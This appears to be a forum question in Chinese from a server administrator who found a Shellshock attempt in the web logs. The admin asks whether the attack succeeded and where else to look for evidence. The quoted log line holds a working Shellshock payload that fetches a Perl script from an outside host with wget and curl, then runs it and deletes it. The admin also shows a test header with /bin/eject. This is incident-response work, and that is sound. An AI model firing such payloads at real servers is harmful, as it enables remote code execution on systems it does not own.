我今天正在查看日志并注意到以下内容：

 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/bo.pl;chmod +x /tmp/bo.pl;perl /tmp/bo.pl;rm -rf /tmp/bo*\""

据我了解，这是尝试扫描 shellshock 漏洞。我检索了加载的文件 bo.pl - 其中包含以下内容...

<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://192.168.1.1/blocking.asp?cat_id=78">
</head>
<body></body>
</html>

现在据我了解，这是使用刷新技术来显示某种blocking.asp 页面。

鉴于有证据表明这是一次恶意攻击，我对此持肯定态度。让我担心的是日志显示响应长度为 13501。但是当我尝试使用简单的shellshock头来测试能力时......

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

我只收到以下日志条目...

71.121.200.199 - - [26/Dec/2016:18:14:11 -0100] "GET / HTTP/1.1" 200 22 "-" "() { :; }; /bin/eject"

我还检查了 /tmp 目录，发现两个文件与日志上的时间不完全对应，但它们看起来很可疑，因为它是一个无头服务器，并且这些文件似乎链接到某种远程桌面服务。

-rw-r--r--  1 0 0    8 Dec 25 03:46 httpd_lua_shm.2693
drwxrwxrwt  2 0 0 4096 Dec 24 18:42 .ICE-unix

所以我的问题是 - 由于响应中的字节如此之大，这似乎是一次成功的攻击吗？除了 bash 历史记录之外，我还应该检查其他什么地方来寻找发生了什么的线索？